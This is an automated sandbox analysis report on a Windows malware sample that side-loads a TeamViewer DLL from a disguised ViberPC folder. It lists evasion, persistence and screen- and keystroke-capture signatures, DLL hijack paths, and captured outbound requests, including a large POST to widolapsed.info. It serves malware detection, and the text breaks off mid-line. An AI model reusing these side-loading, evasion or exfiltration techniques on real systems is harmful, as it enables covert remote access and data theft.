Windows Analysis Report wogZe27GBB

Overview

General Information

Sample Name: wogZe27GBB (renamed file extension from none to exe)
Analysis ID: 483790
MD5: 5efc68abd7fec415e34980d95a06a66a
SHA1: 34b243a0b3e322b8983b528caa5849395360a91d
SHA256: 0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
Tags: exeMappingOOOsigned

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
DLL side loading technique detected
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
EXE planting / hijacking vulnerabilities found
AV process strings found (often used to terminate AV products)
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Process Tree

  • System is w10x64
  • wogZe27GBB.exe (PID: 6416 cmdline: 'C:\Users\user\Desktop\wogZe27GBB.exe' MD5: 5EFC68ABD7FEC415E34980D95A06A66A)
    • UniPrint.exe (PID: 6532 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6644 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6736 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6992 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7052 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7064 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7104 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4884 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4600 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 3888 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 3864 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 3348 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6028 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6252 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 4912 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 6524 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 4420 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: wogZe27GBB.exe ReversingLabs: Detection: 71%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll ReversingLabs: Detection: 51%
Source: 0.2.wogZe27GBB.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0049B32E __EH_prolog3,CryptGenRandom,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_006F605B CryptReleaseContext,

Compliance:

Uses 32bit PE files
Source: wogZe27GBB.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\wogZe27GBB.exe EXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: msimg32.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.3:49752 version: TLS 1.2
PE / OLE file has a valid certificate
Source: wogZe27GBB.exe Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000002.516408588.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.351085287.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355552090.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.373259727.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000002.381228039.000000007098C000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1 Content-Length: 76431 Content-Type: multipart/form-data; boundary=--------3259937207 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: widolapsed.info Connection: Close Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master12.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12418339&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12418339&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: unknown - TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.0000000